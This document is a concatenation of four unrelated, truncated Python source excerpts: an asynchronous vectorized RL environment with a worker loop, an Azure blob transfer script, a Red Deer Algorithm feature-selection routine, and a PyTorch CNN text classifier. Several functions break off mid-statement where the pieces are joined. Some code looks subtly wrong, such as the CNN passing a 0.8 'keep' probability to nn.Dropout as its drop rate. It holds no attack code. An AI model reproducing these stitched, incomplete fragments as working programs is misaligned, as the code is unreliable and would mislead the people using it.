concatenate(results, self.observations, self.single_observation_space)
return deepcopy(self.observations) if self.copy else self.observations
def step_async(self, actions):
"""
Parameters
----------
actions : iterable of samples from `action_space`
List of actions.
"""
self._assert_is_running()
if self._state != AsyncState.DEFAULT:
raise AlreadyPendingCallError('Calling `step_async` while waiting '
'for a pending call to `{0}` to complete.'.format(
self._state.value), self._state.value)
for pipe, action in zip(self.parent_pipes, actions):
pipe.send(('step', action))
self._state = AsyncState.WAITING_STEP
def step_wait(self, timeout=None):
"""
Parameters
----------
timeout : int or float, optional
Number of seconds before the call to `step_wait` times out. If
`None`, the call to `step_wait` never times out.
Returns
-------
observations : sample from `observation_space`
A batch of observations from the vectorized environment.
rewards : `np.ndarray` instance (dtype `np.float_`)
A vector of rewards from the vectorized environment.
dones : `np.ndarray` instance (dtype `np.bool_`)
A vector whose entries indicate whether the episode has ended.
infos : list of dict
A list of auxiliary diagnostic informations.
"""
self._assert_is_running()
if self._state != AsyncState.WAITING_STEP:
raise NoAsyncCallError('Calling `step_wait` without any prior call '
'to `step_async`.', AsyncState.WAITING_STEP.value)
if not self._poll(timeout):
self._state = AsyncState.DEFAULT
raise mp.TimeoutError('The call to `step_wait` has timed out after '
'{0} second{1}.'.format(timeout, 's' if timeout > 1 else ''))
results, successes = zip(*[pipe.recv() for pipe in self.parent_pipes])
self._raise_if_errors(successes)
self._state = AsyncState.DEFAULT
observations_list, rewards, dones, infos = zip(*results)
if not self.shared_memory:
concatenate(observations_list, self.observations,
self.single_observation_space)
return (deepcopy(self.observations) if self.copy else self.observations,
np.array(rewards), np.array(dones, dtype=np.bool_), infos)
def close_extras(self, timeout=None, terminate=False):
"""
Parameters
----------
timeout : int or float, optional
Number of seconds before the call to `close` times out. If `None`,
the call to `close` never times out. If the call to `close` times
out, then all processes are terminated.
terminate : bool (default: `False`)
If `True`, then the `close` operation is forced and all processes
are terminated.
"""
timeout = 0 if terminate else timeout
try:
if self._state != AsyncState.DEFAULT:
logger.warn('Calling `close` while waiting for a pending '
'call to `{0}` to complete.'.format(self._state.value))
function = getattr(self, '{0}_wait'.format(self._state.value))
function(timeout)
except mp.TimeoutError:
terminate = True
if terminate:
for process in self.processes:
if process.is_alive():
process.terminate()
else:
for pipe in self.parent_pipes:
if (pipe is not None) and (not pipe.closed):
pipe.send(('close', None))
for pipe in self.parent_pipes:
if (pipe is not None) and (not pipe.closed):
pipe.recv()
for pipe in self.parent_pipes:
if pipe is not None:
pipe.close()
for process in self.processes:
process.join()
def _poll(self, timeout=None):
self._assert_is_running()
if timeout is None:
return True
end_time = time.time() + timeout
delta = None
for pipe in self.parent_pipes:
delta = max(end_time - time.time(), 0)
if pipe is None:
return False
if pipe.closed or (not pipe.poll(delta)):
return False
return True
def _check_observation_spaces(self):
self._assert_is_running()
for pipe in self.parent_pipes:
pipe.send(('_check_observation_space', self.single_observation_space))
same_spaces, successes = zip(*[pipe.recv() for pipe in self.parent_pipes])
self._raise_if_errors(successes)
if not all(same_spaces):
raise RuntimeError('Some environments have an observation space '
'different from `{0}`. In order to batch observations, the '
'observation spaces from all environments must be '
'equal.'.format(self.single_observation_space))
def _assert_is_running(self):
if self.closed:
raise ClosedEnvironmentError('Trying to operate on `{0}`, after a '
'call to `close()`.'.format(type(self).__name__))
def _raise_if_errors(self, successes):
if all(successes):
return
num_errors = self.num_envs - sum(successes)
assert num_errors > 0
for _ in range(num_errors):
index, exctype, value = self.error_queue.get()
logger.error('Received the following error from Worker-{0}: '
'{1}: {2}'.format(index, exctype.__name__, value))
logger.error('Shutting down Worker-{0}.'.format(index))
self.parent_pipes[index].close()
self.parent_pipes[index] = None
logger.error('Raising the last exception back to the main process.')
raise exctype(value)
def _worker(index, env_fn, pipe, parent_pipe, shared_memory, error_queue):
assert shared_memory is None
env = env_fn()
parent_pipe.close()
try:
while True:
command, data = pipe.recv()
if command == 'reset':
observation = env.reset()
pipe.send((observation, True))
elif command == 'step':
observation, reward, done, info = env.step(data)
if done:
observation = env.reset()
pipe.send(((observation, reward, done, info), True))
elif command == 'seed':
env.seed(data)
pipe.send((None, True))
elif command == 'close':
pipe.send((None, True))
break
elif command == '_check_observation_space':
pipe.send((data == env.observation_space, True))
else:
raise RuntimeError('Received unknown command `{0}`. Must '
'be | |
blobdict
def generate_xferspec_download(
blob_service, args, storage_in_queue, localfile, remoteresource,
contentlength, contentmd5, addfd):
"""Generate an xferspec for download
Parameters:
blob_service - blob service
args - program arguments
storage_in_queue - storage input queue
localfile - name of local resource
remoteresource - name of remote resource
contentlength - content length
contentmd5 - content md5
addfd - create and add file handle
Returns:
xferspec containing instructions
Raises:
ValueError if get_blob_properties returns an invalid result or
contentlength is invalid
"""
# get the file metadata
if contentlength is None or contentmd5 is None:
result = azure_request(
blob_service.get_blob_properties, timeout=args.timeout,
container_name=args.container, blob_name=remoteresource)
if not result:
raise ValueError(
'unexpected result for get_blob_properties is None')
if 'content-md5' in result:
contentmd5 = result['content-md5']
contentlength = long(result['content-length'])
if contentlength < 0:
raise ValueError(
'contentlength is invalid for {}'.format(remoteresource))
print('remote file {} length: {} bytes, md5: {}'.format(
remoteresource, contentlength, contentmd5))
# check if download is needed
if args.skiponmatch and contentmd5 is not None and \
os.path.exists(localfile):
lmd5 = compute_md5_for_file_asbase64(localfile)
print('{}: local {} remote {} ->'.format(
localfile, lmd5, contentmd5), end='')
if lmd5 != contentmd5:
print('MISMATCH, re-downloading')
else:
print('match, skipping download')
return None, None, None, None
tmpfilename = localfile + '.blobtmp'
nchunks = contentlength // args.chunksizebytes
currfileoffset = 0
nstorageops = 0
flock = threading.Lock()
filedesc = None
# preallocate file
with flock:
filedesc = open(tmpfilename, 'wb')
if contentlength > 0:
filedesc.seek(contentlength - 1)
filedesc.write(b'\0')
filedesc.close()
if addfd:
# reopen under r+b mode
filedesc = open(tmpfilename, 'r+b')
else:
filedesc = None
for _ in xrange(nchunks + 1):
chunktoadd = min(args.chunksizebytes, contentlength)
if chunktoadd + currfileoffset > contentlength:
chunktoadd = contentlength - currfileoffset
# on download, chunktoadd must be offset by 1 as the x-ms-range
# header expects it that way. x -> y bytes means first bits of the
# (x+1)th byte to the last bits of the (y+1)th byte. for example,
# 0 -> 511 means byte 1 to byte 512
xferspec = [tmpfilename, args.container, remoteresource, None,
currfileoffset, chunktoadd - 1, flock, filedesc]
currfileoffset = currfileoffset + chunktoadd
nstorageops = nstorageops + 1
storage_in_queue.put(xferspec)
if currfileoffset >= contentlength:
break
return contentlength, nstorageops, contentmd5, filedesc
def generate_xferspec_upload(
args, storage_in_queue, blobskipdict, blockids, localfile,
remoteresource, addfd):
"""Generate an xferspec for upload
Parameters:
args - program arguments
storage_in_queue - storage input queue
blobskipdict - blob skip dictionary
blockids - block id dictionary
localfile - name of local resource
remoteresource - name of remote resource
addfd - create and add file handle
Returns:
xferspec containing instructions
Raises:
Nothing
"""
# compute md5 hash
md5digest = None
if args.computefilemd5:
md5digest = compute_md5_for_file_asbase64(
localfile, as_page_blob(args.pageblob, args.autovhd, localfile))
print('{} md5: {}'.format(localfile, md5digest))
# check if upload is needed
if args.skiponmatch and remoteresource in blobskipdict:
print('{}->{}: local {} remote {} ->'.format(
localfile, remoteresource, md5digest,
blobskipdict[remoteresource][1]), end='')
if md5digest != blobskipdict[remoteresource][1]:
print('MISMATCH, re-uploading')
else:
print('match, skipping upload')
return None, 0, None, None
# create blockids entry
if localfile not in blockids:
blockids[localfile] = []
# partition local file into chunks
filesize = os.path.getsize(localfile)
nchunks = filesize // args.chunksizebytes
currfileoffset = 0
nstorageops = 0
flock = threading.Lock()
filedesc = None
if addfd:
with flock:
filedesc = open(localfile, 'rb')
for _ in xrange(nchunks + 1):
chunktoadd = min(args.chunksizebytes, filesize)
if chunktoadd + currfileoffset > filesize:
chunktoadd = filesize - currfileoffset
blockid = '{0:08d}'.format(currfileoffset // args.chunksizebytes)
blockids[localfile].append(blockid)
xferspec = [localfile, args.container, remoteresource, blockid,
currfileoffset, chunktoadd, flock, filedesc]
currfileoffset = currfileoffset + chunktoadd
nstorageops = nstorageops + 1
storage_in_queue.put(xferspec)
if currfileoffset >= filesize:
break
return filesize, nstorageops, md5digest, filedesc
def apply_file_collation(args, fname, apply_keeproot=False):
"""Apply collation path to a remote filename
Parameters:
args - arguments
fname - file name
apply_keeproot - apply keep rootdir transformation
Returns:
remote filename
Raises:
No special exception handling
"""
remotefname = fname.strip(os.path.sep)
if apply_keeproot and not args.keeprootdir:
rtmp = remotefname.split(os.path.sep)
if len(rtmp) > 1:
remotefname = os.path.sep.join(rtmp[1:])
if args.collate is not None:
remotefname = remotefname.split(
os.path.sep)[-1]
if args.collate != '.':
remotefname = os.path.sep.join(
(args.collate, remotefname))
return remotefname
def main():
"""Main function
Parameters:
None
Returns:
Nothing
Raises:
ValueError for invalid arguments
"""
# get command-line args
args = parseargs()
# check some parameters
if len(args.localresource) < 1 or len(args.storageaccount) < 1 or \
len(args.container) < 1:
raise ValueError('invalid positional arguments')
if len(args.blobep) < 1:
raise ValueError('blob endpoint is invalid')
if args.upload and args.download:
raise ValueError('cannot force transfer direction of download '
'and upload in the same command')
if args.storageaccountkey is not None and args.saskey is not None:
raise ValueError('cannot use both a sas key and storage account key')
if args.pageblob and args.autovhd:
raise ValueError('cannot specify both pageblob and autovhd parameters')
if args.keeprootdir and args.collate is not None:
raise ValueError('cannot specify both keeprootdir and collate path')
if args.timeout is not None and args.timeout <= 0:
args.timeout = None
# get key if we don't have a handle on one
sms = None
if args.saskey is not None:
if len(args.saskey) < 1:
raise ValueError('invalid sas key specified')
elif args.storageaccountkey is None:
if args.managementcert is not None and \
args.subscriptionid is not None:
# check to ensure management cert is valid
if len(args.managementcert) == 0 or \
args.managementcert.split('.')[-1].lower() != 'pem':
raise ValueError('management cert appears to be invalid')
if args.managementep is None or len(args.managementep) == 0:
raise ValueError('management endpoint is invalid')
# expand management cert path out if contains ~
args.managementcert = os.path.abspath(args.managementcert)
# get sms reference
sms = azure.servicemanagement.ServiceManagementService(
args.subscriptionid, args.managementcert, args.managementep)
# get keys
service_keys = azure_request(
sms.get_storage_account_keys, timeout=args.timeout,
service_name=args.storageaccount)
args.storageaccountkey = service_keys.storage_service_keys.primary
else:
raise ValueError('management cert/subscription id not '
'specified without storage account key')
# check storage account key validity
if args.storageaccountkey is not None and \
len(args.storageaccountkey) < 1:
raise ValueError('storage account key is invalid')
# set valid num workers
if args.numworkers < 1:
args.numworkers = 1
# expand any paths
args.localresource = os.path.expanduser(args.localresource)
# sanitize remote file name
if args.remoteresource:
args.remoteresource = args.remoteresource.strip(os.path.sep)
# set chunk size
if args.chunksizebytes is None or args.chunksizebytes < 64:
args.chunksizebytes = _MAX_BLOB_CHUNK_SIZE_BYTES
# set blob ep
blobep = None
if sms:
storage_acct = azure_request(
sms.get_storage_account_properties, timeout=args.timeout,
service_name=args.storageaccount)
blobep = storage_acct.storage_service_properties.endpoints[0]
else:
blobep = 'https://{}.{}/'.format(args.storageaccount, args.blobep)
# create master blob service
blob_service = None
if args.storageaccountkey:
if args.blobep[0] == '.':
host_base = args.blobep
else:
host_base = '.' + args.blobep
if args.timeout is None:
blob_service = azure.storage.blob.BlobService(
account_name=args.storageaccount,
account_key=args.storageaccountkey,
host_base=host_base)
else:
blob_service = azure.storage.blob.BlobService(
account_name=args.storageaccount,
account_key=args.storageaccountkey,
host_base=host_base, timeout=args.timeout)
elif args.saskey:
blob_service = SasBlobService(blobep, args.saskey, args.timeout)
# disable container creation (not possible with SAS)
args.createcontainer = False
if blob_service is None:
raise ValueError('blob_service is invalid')
# check which way we're transfering
xfertoazure = False
if args.upload or (not args.download and
os.path.exists(args.localresource)):
xfertoazure = True
else:
if args.remoteresource is None:
raise ValueError('cannot download remote file if not specified')
# print all parameters
print('======================================')
print(' azure blobxfer parameters [v{}]'.format(_SCRIPT_VERSION))
print('======================================')
print(' subscription id: {}'.format(args.subscriptionid))
print(' management cert: {}'.format(args.managementcert))
print(' transfer direction: {}'.format(
'local->Azure' if xfertoazure else 'Azure->local'))
print(' local resource: {}'.format(args.localresource))
print(' remote resource: {}'.format(args.remoteresource))
print(' max num of workers: {}'.format(args.numworkers))
print(' timeout: {}'.format(args.timeout))
print(' storage account: {}'.format(args.storageaccount))
print(' use SAS: {}'.format(True if args.saskey else False))
print(' upload as page blob: {}'.format(args.pageblob))
print(' auto vhd->page blob: {}'.format(args.autovhd))
print(' container: {}'.format(args.container))
print(' blob container URI: {}'.format(blobep + args.container))
print(' compute file MD5: {}'.format(args.computefilemd5))
print(' skip on MD5 match: {}'.format(args.skiponmatch))
print(' chunk size (bytes): {}'.format(args.chunksizebytes))
print(' create container: {}'.format(args.createcontainer))
print(' keep mismatched MD5: {}'.format(args.keepmismatchedmd5files))
print(' recursive if dir: {}'.format(args.recursive))
print(' keep root dir on up: {}'.format(args.keeprootdir))
print(' collate to: {}'.format(
args.collate if args.collate is not None else 'disabled'))
print('=======================================\n')
# mark start time after init
print('script start time: {}'.format(time.strftime("%Y-%m-%d %H:%M:%S")))
start = time.time()
# populate instruction queues
allfilesize = 0
storage_in_queue = queue.Queue()
nstorageops = 0
blockids = {}
completed_blockids = {}
filemap = {}
filesizes = {}
md5map = {}
filedesc = None
if xfertoazure:
# if skiponmatch is enabled, list blobs first and check
if args.skiponmatch:
blobskipdict = get_blob_listing(blob_service, args)
else:
blobskipdict = {}
if os.path.isdir(args.localresource):
# mirror directory
if args.recursive:
for root, _, files in | |
"""
Programmer: <NAME>
Date of Development: 14/10/2020
This code has been developed according to the procedures mentioned in the following research article:
"Fathollahi-Fard, <NAME>, <NAME>, and <NAME>.
'Red deer algorithm (RDA): a new nature-inspired meta-heuristic.''" Soft Computing (2020): 1-29."
"""
import numpy as np
import time
import matplotlib.pyplot as plt
import random, math
import sys
from sklearn.model_selection import train_test_split
from sklearn import datasets
from Py_FS.wrapper.nature_inspired._utilities import Solution, Data, initialize, sort_agents, display, compute_fitness, Conv_plot
from Py_FS.wrapper.nature_inspired._transfer_functions import get_trans_function
# from _utilities import Solution, Data, initialize, sort_agents, display, compute_fitness, Conv_plot
# from _transfer_functions import get_trans_function
def RDA(num_agents, max_iter, train_data, train_label, obj_function=compute_fitness, trans_function_shape='s', save_conv_graph=False):
# Red Deer Algorithm
############################### Parameters ####################################
# #
# num_agents: number of red deers #
# max_iter: maximum number of generations #
# train_data: training samples of data #
# train_label: class labels for the training samples #
# obj_function: the function to maximize while doing feature selection #
# trans_function_shape: shape of the transfer function used #
# save_conv_graph: boolean value for saving convergence graph #
# #
###############################################################################
# Number of agents must be at least 8
if num_agents < 8:
print("[Error!] The value of the parameter num_agents must be at least 8", file=sys.stderr)
sys.exit(1)
short_name = 'RDA'
agent_name = 'RedDeer'
train_data, train_label = np.array(train_data), np.array(train_label)
num_features = train_data.shape[1]
trans_function = get_trans_function(trans_function_shape)
# setting up the objectives
weight_acc = None
if(obj_function==compute_fitness):
weight_acc = float(input('Weight for the classification accuracy [0-1]: '))
obj = (obj_function, weight_acc)
compute_accuracy = (compute_fitness, 1) # compute_accuracy is just compute_fitness with accuracy weight as 1
# initialize red deers and Leader (the agent with the max fitness)
deer = initialize(num_agents, num_features)
fitness = np.zeros(num_agents)
accuracy = np.zeros(num_agents)
Leader_agent = np.zeros((1, num_features))
Leader_fitness = float("-inf")
Leader_accuracy = float("-inf")
# initialize convergence curves
convergence_curve = {}
convergence_curve['fitness'] = np.zeros(max_iter)
# initialize data class
data = Data()
val_size = float(input('Enter the percentage of data wanted for valdiation [0, 100]: '))/100
data.train_X, data.val_X, data.train_Y, data.val_Y = train_test_split(train_data, train_label, stratify=train_label, test_size=val_size)
# create a solution object
solution = Solution()
solution.num_agents = num_agents
solution.max_iter = max_iter
solution.num_features = num_features
solution.obj_function = obj_function
# initializing parameters
UB = 5 # Upper bound
LB = -5 # Lower bound
gamma = 0.5 # Fraction of total number of males who are chosen as commanders
alpha = 0.2 # Fraction of total number of hinds in a harem who mate with the commander of their harem
beta = 0.1 # Fraction of total number of hinds in a harem who mate with the commander of a different harem
# start timer
start_time = time.time()
# main loop
for iter_no in range(max_iter):
print('\n================================================================================')
print(' Iteration - {}'.format(iter_no+1))
print('================================================================================\n')
deer, fitness = sort_agents(deer, obj, data)
num_males = int(0.25 * num_agents)
num_hinds = num_agents - num_males
males = deer[:num_males,:]
hinds = deer[num_males:,:]
# roaring of male deer
for i in range(num_males):
r1 = np.random.random() # r1 is a random number in [0, 1]
r2 = np.random.random() # r2 is a random number in [0, 1]
r3 = np.random.random() # r3 is a random number in [0, 1]
new_male = males[i].copy()
if r3 >= 0.5: # Eq. (3)
new_male += r1 * (((UB - LB) * r2) + LB)
else:
new_male -= r1 * (((UB - LB) * r2) + LB)
# apply transformation function on the new male
for j in range(num_features):
trans_value = trans_function(new_male[j])
if (np.random.random() < trans_value):
new_male[j] = 1
else:
new_male[j] = 0
if obj_function(new_male, data.train_X, data.val_X, data.train_Y, data.val_Y) < obj_function(males[i], data.train_X, data.val_X, data.train_Y, data.val_Y):
males[i] = new_male
# selection of male commanders and stags
num_coms = int(num_males * gamma) # Eq. (4)
num_stags = num_males - num_coms # Eq. (5)
coms = males[:num_coms,:]
stags = males[num_coms:,:]
# fight between male commanders and stags
for i in range(num_coms):
chosen_com = coms[i].copy()
chosen_stag = random.choice(stags)
r1 = np.random.random()
r2 = np.random.random()
new_male_1 = (chosen_com + chosen_stag) / 2 + r1 * (((UB - LB) * r2) + LB) # Eq. (6)
new_male_2 = (chosen_com + chosen_stag) / 2 - r1 * (((UB - LB) * r2) + LB) # Eq. (7)
# apply transformation function on new_male_1
for j in range(num_features):
trans_value = trans_function(new_male_1[j])
if (np.random.random() < trans_value):
new_male_1[j] = 1
else:
new_male_1[j] = 0
# apply transformation function on new_male_2
for j in range(num_features):
trans_value = trans_function(new_male_2[j])
if (np.random.random() < trans_value):
new_male_2[j] = 1
else:
new_male_2[j] = 0
fitness = np.zeros(4)
fitness[0] = obj_function(chosen_com, data.train_X, data.val_X, data.train_Y, data.val_Y)
fitness[1] = obj_function(chosen_stag, data.train_X, data.val_X, data.train_Y, data.val_Y)
fitness[2] = obj_function(new_male_1, data.train_X, data.val_X, data.train_Y, data.val_Y)
fitness[3] = obj_function(new_male_2, data.train_X, data.val_X, data.train_Y, data.val_Y)
bestfit = np.max(fitness)
if fitness[0] < fitness[1] and fitness[1] == bestfit:
coms[i] = chosen_stag.copy()
elif fitness[0] < fitness[2] and fitness[2] == bestfit:
coms[i] = new_male_1.copy()
elif fitness[0] < fitness[3] and fitness[3] == bestfit:
coms[i] = new_male_2.copy()
# formation of harems
coms, fitness = sort_agents(coms, obj, data)
norm = np.linalg.norm(fitness)
normal_fit = fitness / norm
total = np.sum(normal_fit)
power = normal_fit / total # Eq. (9)
num_harems = [int(x * num_hinds) for x in power] # Eq.(10)
max_harem_size = np.max(num_harems)
harem = np.empty(shape=(num_coms, max_harem_size, num_features))
random.shuffle(hinds)
itr = 0
for i in range(num_coms):
harem_size = num_harems[i]
for j in range(harem_size):
harem[i][j] = hinds[itr]
itr += 1
# mating of commander with hinds in his harem
num_harem_mate = [int(x * alpha) for x in num_harems] # Eq. (11)
population_pool = list(deer)
for i in range(num_coms):
random.shuffle(harem[i])
for j in range(num_harem_mate[i]):
r = np.random.random() # r is a random number in [0, 1]
offspring = (coms[i] + harem[i][j]) / 2 + (UB - LB) * r # Eq. (12)
# apply transformation function on offspring
for j in range(num_features):
trans_value = trans_function(offspring[j])
if (np.random.random() < trans_value):
offspring[j] = 1
else:
offspring[j] = 0
population_pool.append(list(offspring))
# if number of commanders is greater than 1, inter-harem mating takes place
if num_coms > 1:
# mating of commander with hinds in another harem
k = i
while k == i:
k = random.choice(range(num_coms))
num_mate = int(num_harems[k] * beta) # Eq. (13)
np.random.shuffle(harem[k])
for j in range(num_mate):
r = np.random.random() # r is a random number in [0, 1]
offspring = (coms[i] + harem[k][j]) / 2 + (UB - LB) * r
# apply transformation function on offspring
for j in range(num_features):
trans_value = trans_function(offspring[j])
if (np.random.random() < trans_value):
offspring[j] = 1
else:
offspring[j] = 0
population_pool.append(list(offspring))
# mating of stag with nearest hind
for stag in stags:
dist = np.zeros(num_hinds)
for i in range(num_hinds):
dist[i] = math.sqrt(np.sum((stag-hinds[i])*(stag-hinds[i])))
min_dist = np.min(dist)
for i in range(num_hinds):
distance = math.sqrt(np.sum((stag-hinds[i])*(stag-hinds[i]))) # Eq. (14)
if(distance == min_dist):
r = np.random.random() # r is a random number in [0, 1]
offspring = (stag + hinds[i])/2 + (UB - LB) * r
# apply transformation function on offspring
for j in range(num_features):
trans_value = trans_function(offspring[j])
if (np.random.random() < trans_value):
offspring[j] = 1
else:
offspring[j] = 0
population_pool.append(list(offspring))
break
# selection of the next generation
population_pool = np.array(population_pool)
population_pool, fitness = sort_agents(population_pool, obj, data)
maximum = sum([f for f in fitness])
selection_probs = [f/maximum for f in fitness]
indices = np.random.choice(len(population_pool), size=num_agents, replace=True, p=selection_probs)
deer = population_pool[indices]
# update final information
deer, fitness = sort_agents(deer, obj, data)
display(deer, fitness, agent_name)
if fitness[0] > Leader_fitness:
Leader_agent = deer[0].copy()
Leader_fitness = fitness[0].copy()
convergence_curve['fitness'][iter_no] = np.mean(fitness)
# compute final accuracy
Leader_agent, Leader_accuracy = sort_agents(Leader_agent, compute_accuracy, data)
deer, accuracy = sort_agents(deer, compute_accuracy, data)
print('\n================================================================================')
print(' Final Result ')
print('================================================================================\n')
print('Leader ' + agent_name + ' Dimension : {}'.format(int(np.sum(Leader_agent))))
print('Leader ' + agent_name + ' Fitness : {}'.format(Leader_fitness))
print('Leader ' + agent_name + ' Classification Accuracy : {}'.format(Leader_accuracy))
print('\n================================================================================\n')
# stop timer
end_time = time.time()
exec_time = end_time - start_time
# plot convergence graph
fig, axes = Conv_plot(convergence_curve)
if(save_conv_graph):
plt.savefig('convergence_graph_'+ short_name + '.jpg')
| |
<reponame>preduct0r/mixup-text
import logging
import math
import os
from operator import itemgetter
import sys
from typing import List, Tuple, Iterator, Optional
# from . import optimize
from .classifier import Classifier, AlgorithmProps
from .utils import calculate_confidence_threshold
sys.path.append('..')
from classifier_trainer.app.exceptions import NotIntegerException, ThresholdCouldNotCountException
from classifier_trainer.app.settings import BASE_DIR
from common import custom_types
from common.utils import flatten, reverse_flatten
import torch
from torch.utils.data import DataLoader, Dataset, WeightedRandomSampler
from torch.nn import Sequential
from torch.nn import functional as F
from torch import nn
import torch.cuda as cuda
import gensim
import numpy as np
import pandas as pd
from copy import deepcopy
import random
import time
from sklearn.metrics import f1_score, accuracy_score, classification_report, confusion_matrix, recall_score
# from memory_profiler import profile
def set_seed(seed):
np.random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
# torch.set_deterministic(True)
random.seed(seed)
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
set_seed(43)
logger = logging.getLogger(__name__)
# from sampler import BalancedBatchSampler
class CNNProps(AlgorithmProps):
model__embeddings = custom_types.String()
model__vocabulary = custom_types.String()
model__embeddings_dim = custom_types.Integer(default=100)
model__filter_sizes = custom_types.Collection(list, default=(1, 1, 1, 2, 2, 2))
model__num_filters = custom_types.Integer(default=128)
model__dropout_keep_prob = custom_types.Float(default=0.8)
model__l2_reg_lambda = custom_types.Float(default=0.0)
model__learning_rate = custom_types.Float(default=2e-3)
model__batch_size = custom_types.Integer(default=64)
model__evaluate_every = custom_types.Integer(default=300)
model__max_len = custom_types.Integer(default=64)
model__max_epoch_num = custom_types.Integer(default=10)
model__label_smoothing = custom_types.Boolean(default=True)
optimization__save_ckpt = custom_types.Boolean(default=True)
optimization__freeze_graph = custom_types.Boolean(default=True)
optimization__quantize_weights = custom_types.Boolean(default=False)
def to_internal_value(self, config):
return flatten(config)
def to_external_value(self, data):
return reverse_flatten({
"algorithm": "CNN",
"model__embeddings_dim": data.get("model__embeddings_dim"),
"model__filter_sizes": data.get("model__filter_sizes"),
"model__num_filters": data.get("model__num_filters"),
"model__l2_reg_lambda": data.get("model__l2_reg_lambda"),
"model__max_len": data.get("model__max_len"),
"threshold__confidence_threshold": data.get("threshold__confidence_threshold"),
})
class Meta:
fields = [
"model__embeddings",
"model__vocabulary",
"model__embeddings_dim",
"model__filter_sizes",
"model__num_filters",
"model__dropout_keep_prob",
"model__l2_reg_lambda",
"model__learning_rate",
"model__batch_size",
"model__evaluate_every",
"model__max_len",
"model__max_epoch_num",
"threshold__confidence_threshold",
"optimization__save_ckpt",
"optimization__freeze_graph",
"optimization__quantize_weights"
]
def create_emb_layer(embeddings, non_trainable=False):
# emb_layer = nn.Embedding(embeddings.shape[0], embeddings.shape[1])
# emb_layer.weight.data.copy_(torch.from_numpy(embeddings))
# if non_trainable:
# emb_layer.weight.requires_grad = False
emb_layer = nn.Embedding.from_pretrained(torch.FloatTensor(embeddings))
emb_layer.weight.requires_grad = not non_trainable
return emb_layer
class My_Dataset(Dataset):
def __init__(self, x, y):
self.x = x
self.y = y
def __len__(self):
return len(self.y)
def __getitem__(self, idx):
return torch.LongTensor(self.x[idx, :]), torch.FloatTensor(self.y[idx, :])
class CNN(nn.Module):
def __init__(self, conf_file=None):
super(CNN, self).__init__()
if conf_file is None:
conf_file = os.path.join(BASE_DIR, "engine", "setting", "cnn.yaml")
self.properties = CNNProps(
path=conf_file
)
self.labels = []
self.vocabulary = []
self.embeddings = None
self.sess = None
self.train_optimizer = None
self.global_step = None
self.best_step = None
self.loss = None
self.accuracy = None
self.epoch = None
self.input_x = None
self.input_y = None
self.dropout_keep_prob = None
self.weight_dacay = 1e-4
self.embeddings, self.vocabulary = self._init_embeddings_and_vocab(self.properties.model__embeddings,
self.properties.model__vocabulary,
self.properties.model__embeddings_dim)
self.properties.model__embeddings_dim = np.shape(self.embeddings)[1]
if not (self.properties.optimization__save_ckpt
or self.properties.optimization__freeze_graph):
message = "'save_ckpt', 'freeze' and 'quantize_weights' parameters are False. Please check {}"\
.format(conf_file)
logger.error(message)
raise ValueError(message)
#Tensorflow and PyTorch typically order their batches of images
# (TF: NHWC, PyTorch: NCHW) and weights (TF: HWCiCo, PyTorch CoCiHW)
self.convs = nn.ModuleList([nn.Conv2d(in_channels=1, out_channels=self.properties.model__num_filters,
kernel_size=(k, self.properties.model__embeddings_dim), bias=True) for k in self.properties.model__filter_sizes])
# проверка влияния инициализации на результат
for conv in self.convs:
torch.nn.init.trunc_normal_(conv.weight, std=0.1)
self.dropout = nn.Dropout(p=self.properties.model__dropout_keep_prob)
def forward(self, x, hidden=None):
emb = self.emb_layer(x)
emb = torch.unsqueeze(emb, -1).permute(0,3,1,2)
convs = [F.relu(conv(emb)) for conv in self.convs]
pools = [F.max_pool2d(input=conv, kernel_size=(self.properties.model__max_len - k + 1, 1)) \
for k,conv in zip(self.properties.model__filter_sizes, convs)]
cat = torch.squeeze(self.dropout(torch.cat(pools, dim=1)))
out = self.linear(cat)
return out
# @profile
def validate(self, data) -> Tuple[float, int]:
self.labels = data.return_unique_labels()
# создаем linear_layer когда знаем сколько уникальных классов в выборке
self.linear = nn.Linear(in_features=768,out_features=len(self.labels))
# проверка влияния инициализации на результат
torch.nn.init.trunc_normal_(self.linear.weight, std=0.1)
training_samples, target_labels = data.get_train_part()
test_samples, target_test_labels = data.get_test_part()
if self.properties.model__evaluate_every == -1:
self.properties.model__evaluate_every = max(1, int(len(target_labels) / 50))
self._add_unknown_words_to_model(training_samples)
# создаем emb_layer только после добавления всех слов в vocabulary
self.emb_layer = create_emb_layer(self.embeddings, False)
training_samples = self._digitize_sents(training_samples)
target_labels = self._digitize_labels(target_labels)
test_samples = self._digitize_sents(test_samples)
target_test_labels = self._digitize_labels(target_test_labels)
accuracy, self.best_step = self._train_classifier_with_test(
training_samples, test_samples, target_labels, target_test_labels
)
return accuracy, self.best_step
def fit(self, data):
self.labels = data.return_unique_labels()
# создаем linear_layer когда знаем сколько уникальных классов в выборке
self.linear = nn.Linear(in_features=768, out_features=len(self.labels))
# проверка влияния инициализации на результат
torch.nn.init.trunc_normal_(self.linear.weight, std=0.1)
training_samples, target_labels = data.get_data()
if self.properties.model__evaluate_every == -1:
self.properties.model__evaluate_every = max(1, int(len(target_labels) / 50))
self._add_unknown_words_to_model(training_samples)
# создаем emb_layer только после добавления всех слов в vocabulary
self.emb_layer = create_emb_layer(self.embeddings, False)
training_samples = self._digitize_sents(training_samples)
target_labels = self._digitize_labels(target_labels)
self._train_classifier(training_samples, target_labels)
try:
self.properties.threshold__confidence_threshold = \
calculate_confidence_threshold(self.properties, data.get_count_avg_examples(),
data.get_count_classes())
except NotIntegerException as e:
logger.error(str(e))
raise ThresholdCouldNotCountException(str(e))
def save(self, model_path: Optional[str] = None):
"""
folder logic, check configs
"""
logger.info("Saving Pytorch CNN started")
if model_path is None:
model_path = os.path.abspath("torch_cnn_model")
try:
os.makedirs(model_path)
except FileExistsError:
logger.warning("SaveModel directory {} already exists"
.format(model_path))
checkpoint_dir = os.path.join(model_path, "torch_folder")
ckpt_filepath = os.path.join(checkpoint_dir, "torch_cnn.pt")
try:
os.makedirs(checkpoint_dir)
except FileExistsError:
logger.warning("Checkpoint directory {} already exists"
.format(checkpoint_dir))
#Первый способ
# torch.save({
# 'epoch': self.epoch,
# 'model_state_dict': self.state_dict(),
# 'optimizer_state_dict': self.optimizer.state_dict(),
# 'loss': self.loss,
# }, ckpt_filepath)
#Второй способ
torch.save(self.state_dict(), os.path.join(checkpoint_dir, 'only_state_dict.pt'))
#TODO проверка не лучше ли этот способ
#Третий способ
torch.save(self, os.path.join(checkpoint_dir, 'second_option.pt'))
